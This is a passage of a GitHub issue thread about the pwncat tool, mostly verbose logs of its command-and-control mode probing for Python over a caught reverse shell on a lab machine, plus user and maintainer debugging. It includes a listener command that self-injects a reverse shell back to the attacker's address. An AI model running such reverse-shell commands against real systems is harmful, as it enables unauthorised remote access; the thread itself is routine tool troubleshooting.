2020-06-12 15:46:52,956 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.8/bin/python3.7
2020-06-12 15:46:52,956 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.154.144:34498
2020-06-12 15:46:52,956 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.8/bin/python3.7 && echo /opt/python3.8/bin/python3.7 || echo;\n'
2020-06-12 15:46:52,956 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:52,982 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:52,982 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.8/bin/python3.8
2020-06-12 15:46:52,982 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.154.144:34498
2020-06-12 15:46:52,983 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.8/bin/python3.8 && echo /opt/python3.8/bin/python3.8 || echo;\n'
2020-06-12 15:46:52,983 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:53,007 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:53,007 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] No Python has been found. Aborting and handing over to current shell.
2020-06-12 15:46:53,008 TRACE [RECV] 3476:run_action(): [RECV] Producer Start
2020-06-12 15:46:53,008 TRACE [STDIN] 3476:run_action(): [STDIN] Producer Start
2020-06-12 15:46:53,033 DEBUG [RECV] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:53,033 TRACE [RECV] 1944:receive(): Received: '\n$ '
2020-06-12 15:46:53,033 TRACE [RECV] 3478:run_action(): [RECV] Producer received: '\n$ '

$ 2020-06-12 15:46:53,103 DEBUG [RECV] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:53,103 TRACE [RECV] 1944:receive(): Received: '\n$ '
2020-06-12 15:46:53,103 TRACE [RECV] 3478:run_action(): [RECV] Producer received: '\n$ '

`
i currently have 2.7 installed. installing 3.6 now and will try again

from pwncat.

dalemazza avatar dalemazza commented on July 28, 2024

so i have got python 3.6 same problem still.
image
That is all the python versions installed in /usr/bin on the target box

from pwncat.

cytopia avatar cytopia commented on July 28, 2024

The remote end somehow sends this first:

Linux vulnuniversity 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

Probably a response to uname -a? Did u issue that while probing?

It's also receiving something like this prior/during probing:

 15:46:44 up 27 min,  0 users,  load average: 0.00, 0.00, 0.07\n
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT\n
uid=33(www-data) gid=33(www-data) groups=33(www-data)\n
/bin/sh: 0: can't access tty; job control turned off\n

Did u issue any other commands related to this received output?

from pwncat.

dalemazza avatar dalemazza commented on July 28, 2024

i did not use that cmd no. all i sent was
kali@kali:~/thm$ pwncat -l 1234 --self-inject /bin/bash:10.9.33.138:1234 -vvvvv

unsure why the remote would be somehow sending that back first?

all i have tried is the self inject function. I also tried deploying it manually but it crashes the shell when i paste the base 64 in every time i have tried that haha

from pwncat.

dalemazza avatar dalemazza commented on July 28, 2024

Am i right in saying it should be sending an -if not just -f ?

from pwncat.

cytopia avatar cytopia commented on July 28, 2024

@dalemazza can you try out branch release-0.0.24 and if it doesn't work paste the full verbose -vvvv invocation again.

from pwncat.

dalemazza avatar dalemazza commented on July 28, 2024
kali@kali:/opt/pwncat/pwncat$ pwncat -l 1234 --self-inject /bin/bash:10.9.33.138:1234 -vvvv
2020-06-12 17:05:18,065 DEBUG [MainThread] 1447:create_socket(): Creating (family 10/IPv6, TCP) socket
2020-06-12 17:05:18,065 DEBUG [MainThread] 1467:create_socket(): Disabling IPv4 support on IPv6 socket
2020-06-12 17:05:18,065 DEBUG [MainThread] 1447:create_socket(): Creating (family 2/IPv4, TCP) socket
2020-06-12 17:05:18,065 DEBUG [MainThread] 1385:gethostbyname(): Resolving IPv6 name not required, using wildcard: ::
2020-06-12 17:05:18,065 DEBUG [MainThread] 1382:gethostbyname(): Resolving IPv4 name not required, using wildcard: 0.0.0.0
2020-06-12 17:05:18,065 DEBUG [MainThread] 1498:bind(): Binding (family 10/IPv6, TCP) socket to :::1234
2020-06-12 17:05:18,065 DEBUG [MainThread] 1498:bind(): Binding (family 2/IPv4, TCP) socket to 0.0.0.0:1234
2020-06-12 17:05:18,065 DEBUG [MainThread] 1526:listen(): Listening with backlog=0
2020-06-12 17:05:18,065 INFO [MainThread] 2151:run_server(): Listening on :::1234 (family 10/IPv6, TCP)
2020-06-12 17:05:18,065 DEBUG [MainThread] 1526:listen(): Listening with backlog=0
2020-06-12 17:05:18,065 INFO [MainThread] 2151:run_server(): Listening on 0.0.0.0:1234 (family 2/IPv4, TCP)
2020-06-12 17:05:18,065 DEBUG [MainThread] 1549:accept(): Waiting for TCP client
2020-06-12 17:05:28,451 INFO [MainThread] 1561:accept(): Client connected from 10.10.182.191:45802 (family 2/IPv4, TCP)
[PWNCAT CnC] Probing for: /bin/python
2020-06-12 17:05:28,452 DEBUG [MainThread] 1803:send(): Trying to send 49 bytes to 10.10.182.191:45802
2020-06-12 17:05:28,452 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /bin/python && echo /bin/python || echo;\n'
2020-06-12 17:05:28,452 DEBUG [MainThread] 1826:send(): Sent 49 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:28,454 DEBUG [MainThread] 1938:receive(): Received 115 bytes from 10.10.182.191:45802
2020-06-12 17:05:28,454 TRACE [MainThread] 1944:receive(): Received: 'Linux vulnuniversity 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux\n'
[PWNCAT CnC] Probing for: /bin/python2
2020-06-12 17:05:28,454 DEBUG [MainThread] 1803:send(): Trying to send 51 bytes to 10.10.182.191:45802
2020-06-12 17:05:28,454 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /bin/python2 && echo /bin/python2 || echo;\n'
2020-06-12 17:05:28,454 DEBUG [MainThread] 1826:send(): Sent 51 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:28,482 DEBUG [MainThread] 1938:receive(): Received 243 bytes from 10.10.182.191:45802
2020-06-12 17:05:28,482 TRACE [MainThread] 1944:receive(): Received: " 17:05:28 up 13 min,  0 users,  load average: 0.00, 0.15, 0.24\nUSER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n/bin/sh: 0: can't access tty; job control turned off\n$ \n$ "
[PWNCAT CnC] Probing for: /bin/python2.7
2020-06-12 17:05:28,483 DEBUG [MainThread] 1803:send(): Trying to send 55 bytes to 10.10.182.191:45802
2020-06-12 17:05:28,483 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /bin/python2.7 && echo /bin/python2.7 || echo;\n'
2020-06-12 17:05:28,483 DEBUG [MainThread] 1826:send(): Sent 55 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:28,506 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:28,506 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /bin/python3
2020-06-12 17:05:28,506 DEBUG [MainThread] 1803:send(): Trying to send 51 bytes to 10.10.182.191:45802
2020-06-12 17:05:28,506 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /bin/python3 && echo /bin/python3 || echo;\n'
2020-06-12 17:05:28,506 DEBUG [MainThread] 1826:send(): Sent 51 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:28,530 DEBUG [MainThread] 1938:receive(): Received 1 bytes from 10.10.182.191:45802
2020-06-12 17:05:28,530 TRACE [MainThread] 1944:receive(): Received: '\n'
[PWNCAT CnC] Probing for: /bin/python3.5
2020-06-12 17:05:28,530 DEBUG [MainThread] 1803:send(): Trying to send 55 bytes to 10.10.182.191:45802
2020-06-12 17:05:28,530 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /bin/python3.5 && echo /bin/python3.5 || echo;\n'
2020-06-12 17:05:28,530 DEBUG [MainThread] 1826:send(): Sent 55 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:28,720 DEBUG [MainThread] 1938:receive(): Received 2 bytes from 10.10.182.191:45802
2020-06-12 17:05:28,720 TRACE [MainThread] 1944:receive(): Received: '$ '
[PWNCAT CnC] Probing for: /bin/python3.6
2020-06-12 17:05:28,720 DEBUG [MainThread] 1803:send(): Trying to send 55 bytes to 10.10.182.191:45802
2020-06-12 17:05:28,720 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /bin/python3.6 && echo /bin/python3.6 || echo;\n'
2020-06-12 17:05:28,720 DEBUG [MainThread] 1826:send(): Sent 55 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:28,744 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:28,744 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /bin/python3.7
2020-06-12 17:05:28,744 DEBUG [MainThread] 1803:send(): Trying to send 55 bytes to 10.10.182.191:45802
2020-06-12 17:05:28,744 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /bin/python3.7 && echo /bin/python3.7 || echo;\n'
2020-06-12 17:05:28,744 DEBUG [MainThread] 1826:send(): Sent 55 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:28,811 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:28,811 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /bin/python3.8
2020-06-12 17:05:28,811 DEBUG [MainThread] 1803:send(): Trying to send 55 bytes to 10.10.182.191:45802
2020-06-12 17:05:28,811 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /bin/python3.8 && echo /bin/python3.8 || echo;\n'
2020-06-12 17:05:28,811 DEBUG [MainThread] 1826:send(): Sent 55 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:28,945 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:28,945 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/bin/python
2020-06-12 17:05:28,945 DEBUG [MainThread] 1803:send(): Trying to send 57 bytes to 10.10.182.191:45802
2020-06-12 17:05:28,945 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/bin/python && echo /usr/bin/python || echo;\n'
2020-06-12 17:05:28,945 DEBUG [MainThread] 1826:send(): Sent 57 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:29,016 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:29,016 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/bin/python2
2020-06-12 17:05:29,016 DEBUG [MainThread] 1803:send(): Trying to send 59 bytes to 10.10.182.191:45802
2020-06-12 17:05:29,016 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/bin/python2 && echo /usr/bin/python2 || echo;\n'
2020-06-12 17:05:29,016 DEBUG [MainThread] 1826:send(): Sent 59 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:29,042 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:29,042 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/bin/python2.7
2020-06-12 17:05:29,042 DEBUG [MainThread] 1803:send(): Trying to send 63 bytes to 10.10.182.191:45802
2020-06-12 17:05:29,042 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/bin/python2.7 && echo /usr/bin/python2.7 || echo;\n'
2020-06-12 17:05:29,042 DEBUG [MainThread] 1826:send(): Sent 63 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:29,067 DEBUG [MainThread] 1938:receive(): Received 18 bytes from 10.10.182.191:45802
2020-06-12 17:05:29,067 TRACE [MainThread] 1944:receive(): Received: '/usr/bin/python\n$ '
[PWNCAT CnC] Probing for: /usr/bin/python3
2020-06-12 17:05:29,067 DEBUG [MainThread] 1803:send(): Trying to send 59 bytes to 10.10.182.191:45802
2020-06-12 17:05:29,067 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/bin/python3 && echo /usr/bin/python3 || echo;\n'
2020-06-12 17:05:29,067 DEBUG [MainThread] 1826:send(): Sent 59 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:29,092 DEBUG [MainThread] 1938:receive(): Received 19 bytes from 10.10.182.191:45802
2020-06-12 17:05:29,092 TRACE [MainThread] 1944:receive(): Received: '/usr/bin/python2\n$ '
[PWNCAT CnC] Probing for: /usr/bin/python3.5
2020-06-12 17:05:29,092 DEBUG [MainThread] 1803:send(): Trying to send 63 bytes to 10.10.182.191:45802
2020-06-12 17:05:29,092 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/bin/python3.5 && echo /usr/bin/python3.5 || echo;\n'
2020-06-12 17:05:29,092 DEBUG [MainThread] 1826:send(): Sent 63 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:29,118 DEBUG [MainThread] 1938:receive(): Received 21 bytes from 10.10.182.191:45802
2020-06-12 17:05:29,118 TRACE [MainThread] 1944:receive(): Received: '/usr/bin/python2.7\n$ '
[PWNCAT CnC] Probing for: /usr/bin/python3.6
2020-06-12 17:05:29,118 DEBUG [MainThread] 1803:send(): Trying to send 63 bytes to 10.10.182.191:45802
2020-06-12 17:05:29,118 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/bin/python3.6 && echo /usr/bin/python3.6 || echo;\n'
2020-06-12 17:05:29,118 DEBUG [MainThread] 1826:send(): Sent 63 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:29,143 DEBUG [MainThread] 1938:receive(): Received 19 bytes from 10.10.182.191:45802
2020-06-12 17:05:29,144 TRACE [MainThread] 1944:receive(): Received: '/usr/bin/python3\n$ '
[PWNCAT CnC] Probing for: /usr/bin/python3.7
2020-06-12 17:05:29,144 DEBUG [MainThread] 1803:send(): Trying to send 63 bytes to 10.10.182.191:45802
2020-06-12 17:05:29,144 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/bin/python3.7 && echo /usr/bin/python3.7 || echo;\n'
2020-06-12 17:05:29,144 DEBUG [MainThread] 1826:send(): Sent 63 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:29,334 DEBUG [MainThread] 1938:receive(): Received 21 bytes from 10.10.182.191:45802
2020-06-12 17:05:29,334 TRACE [MainThread] 1944:receive(): Received: '/usr/bin/python3.5\n$ '
[PWNCAT CnC] Probing for: /usr/bin/python3.8
2020-06-12 17:05:29,335 DEBUG [MainThread] 1803:send(): Trying to send 63 bytes to 10.10.182.191:45802
2020-06-12 17:05:29,335 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/bin/python3.8 && echo /usr/bin/python3.8 || echo;\n'
2020-06-12 17:05:29,335 DEBUG [MainThread] 1826:send(): Sent 63 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:29,359 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:29,359 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/bin/python
2020-06-12 17:05:29,359 DEBUG [MainThread] 1803:send(): Trying to send 69 bytes to 10.10.182.191:45802
2020-06-12 17:05:29,359 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/bin/python && echo /usr/local/bin/python || echo;\n'
2020-06-12 17:05:29,359 DEBUG [MainThread] 1826:send(): Sent 69 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:29,425 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:29,425 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/bin/python2
2020-06-12 17:05:29,425 DEBUG [MainThread] 1803:send(): Trying to send 71 bytes to 10.10.182.191:45802
2020-06-12 17:05:29,425 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/bin/python2 && echo /usr/local/bin/python2 || echo;\n'
2020-06-12 17:05:29,425 DEBUG [MainThread] 1826:send(): Sent 71 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:29,630 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:29,630 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/bin/python2.7
2020-06-12 17:05:29,630 DEBUG [MainThread] 1803:send(): Trying to send 75 bytes to 10.10.182.191:45802
2020-06-12 17:05:29,631 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/bin/python2.7 && echo /usr/local/bin/python2.7 || echo;\n'
2020-06-12 17:05:29,631 DEBUG [MainThread] 1826:send(): Sent 75 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:29,655 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:29,655 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/bin/python3
2020-06-12 17:05:29,655 DEBUG [MainThread] 1803:send(): Trying to send 71 bytes to 10.10.182.191:45802
2020-06-12 17:05:29,655 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/bin/python3 && echo /usr/local/bin/python3 || echo;\n'
2020-06-12 17:05:29,655 DEBUG [MainThread] 1826:send(): Sent 71 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:29,681 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:29,681 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/bin/python3.5
2020-06-12 17:05:29,681 DEBUG [MainThread] 1803:send(): Trying to send 75 bytes to 10.10.182.191:45802
2020-06-12 17:05:29,681 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/bin/python3.5 && echo /usr/local/bin/python3.5 || echo;\n'
2020-06-12 17:05:29,681 DEBUG [MainThread] 1826:send(): Sent 75 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:29,706 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:29,706 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/bin/python3.6
2020-06-12 17:05:29,707 DEBUG [MainThread] 1803:send(): Trying to send 75 bytes to 10.10.182.191:45802
2020-06-12 17:05:29,707 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/bin/python3.6 && echo /usr/local/bin/python3.6 || echo;\n'
2020-06-12 17:05:29,707 DEBUG [MainThread] 1826:send(): Sent 75 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:29,735 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:29,735 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/bin/python3.7
2020-06-12 17:05:29,735 DEBUG [MainThread] 1803:send(): Trying to send 75 bytes to 10.10.182.191:45802
2020-06-12 17:05:29,735 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/bin/python3.7 && echo /usr/local/bin/python3.7 || echo;\n'
2020-06-12 17:05:29,735 DEBUG [MainThread] 1826:send(): Sent 75 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:29,760 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:29,760 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/bin/python3.8
2020-06-12 17:05:29,761 DEBUG [MainThread] 1803:send(): Trying to send 75 bytes to 10.10.182.191:45802
2020-06-12 17:05:29,761 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/bin/python3.8 && echo /usr/local/bin/python3.8 || echo;\n'
2020-06-12 17:05:29,761 DEBUG [MainThread] 1826:send(): Sent 75 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:29,949 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:29,949 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python/bin/python
2020-06-12 17:05:29,949 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:29,949 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python/bin/python && echo /usr/local/python/bin/python || echo;\n'
2020-06-12 17:05:29,949 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:29,977 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:29,977 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python/bin/python2
2020-06-12 17:05:29,977 DEBUG [MainThread] 1803:send(): Trying to send 85 bytes to 10.10.182.191:45802
2020-06-12 17:05:29,977 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python/bin/python2 && echo /usr/local/python/bin/python2 || echo;\n'
2020-06-12 17:05:29,977 DEBUG [MainThread] 1826:send(): Sent 85 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:30,040 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:30,041 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python/bin/python2.7
2020-06-12 17:05:30,041 DEBUG [MainThread] 1803:send(): Trying to send 89 bytes to 10.10.182.191:45802
2020-06-12 17:05:30,042 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python/bin/python2.7 && echo /usr/local/python/bin/python2.7 || echo;\n'
2020-06-12 17:05:30,042 DEBUG [MainThread] 1826:send(): Sent 89 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:30,174 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:30,174 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python/bin/python3
2020-06-12 17:05:30,174 DEBUG [MainThread] 1803:send(): Trying to send 85 bytes to 10.10.182.191:45802
2020-06-12 17:05:30,174 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python/bin/python3 && echo /usr/local/python/bin/python3 || echo;\n'
2020-06-12 17:05:30,174 DEBUG [MainThread] 1826:send(): Sent 85 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:30,244 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:30,245 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python/bin/python3.5
2020-06-12 17:05:30,245 DEBUG [MainThread] 1803:send(): Trying to send 89 bytes to 10.10.182.191:45802
2020-06-12 17:05:30,245 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python/bin/python3.5 && echo /usr/local/python/bin/python3.5 || echo;\n'
2020-06-12 17:05:30,245 DEBUG [MainThread] 1826:send(): Sent 89 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:30,268 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:30,268 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python/bin/python3.6
2020-06-12 17:05:30,268 DEBUG [MainThread] 1803:send(): Trying to send 89 bytes to 10.10.182.191:45802
2020-06-12 17:05:30,268 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python/bin/python3.6 && echo /usr/local/python/bin/python3.6 || echo;\n'
2020-06-12 17:05:30,269 DEBUG [MainThread] 1826:send(): Sent 89 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:30,295 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:30,295 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python/bin/python3.7
2020-06-12 17:05:30,295 DEBUG [MainThread] 1803:send(): Trying to send 89 bytes to 10.10.182.191:45802
2020-06-12 17:05:30,295 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python/bin/python3.7 && echo /usr/local/python/bin/python3.7 || echo;\n'
2020-06-12 17:05:30,295 DEBUG [MainThread] 1826:send(): Sent 89 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:30,328 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:30,328 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python/bin/python3.8
2020-06-12 17:05:30,328 DEBUG [MainThread] 1803:send(): Trying to send 89 bytes to 10.10.182.191:45802
2020-06-12 17:05:30,328 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python/bin/python3.8 && echo /usr/local/python/bin/python3.8 || echo;\n'
2020-06-12 17:05:30,328 DEBUG [MainThread] 1826:send(): Sent 89 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:30,352 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:30,352 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2/bin/python
2020-06-12 17:05:30,352 DEBUG [MainThread] 1803:send(): Trying to send 85 bytes to 10.10.182.191:45802
2020-06-12 17:05:30,352 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2/bin/python && echo /usr/local/python2/bin/python || echo;\n'
2020-06-12 17:05:30,352 DEBUG [MainThread] 1826:send(): Sent 85 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:30,376 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:30,376 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2/bin/python2
2020-06-12 17:05:30,376 DEBUG [MainThread] 1803:send(): Trying to send 87 bytes to 10.10.182.191:45802
2020-06-12 17:05:30,376 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2/bin/python2 && echo /usr/local/python2/bin/python2 || echo;\n'
2020-06-12 17:05:30,376 DEBUG [MainThread] 1826:send(): Sent 87 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:30,564 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:30,564 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2/bin/python2.7
2020-06-12 17:05:30,565 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:30,565 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2/bin/python2.7 && echo /usr/local/python2/bin/python2.7 || echo;\n'
2020-06-12 17:05:30,565 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:30,588 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:30,589 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2/bin/python3
2020-06-12 17:05:30,589 DEBUG [MainThread] 1803:send(): Trying to send 87 bytes to 10.10.182.191:45802
2020-06-12 17:05:30,589 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2/bin/python3 && echo /usr/local/python2/bin/python3 || echo;\n'
2020-06-12 17:05:30,589 DEBUG [MainThread] 1826:send(): Sent 87 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:30,654 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:30,654 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2/bin/python3.5
2020-06-12 17:05:30,654 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:30,654 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2/bin/python3.5 && echo /usr/local/python2/bin/python3.5 || echo;\n'
2020-06-12 17:05:30,654 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
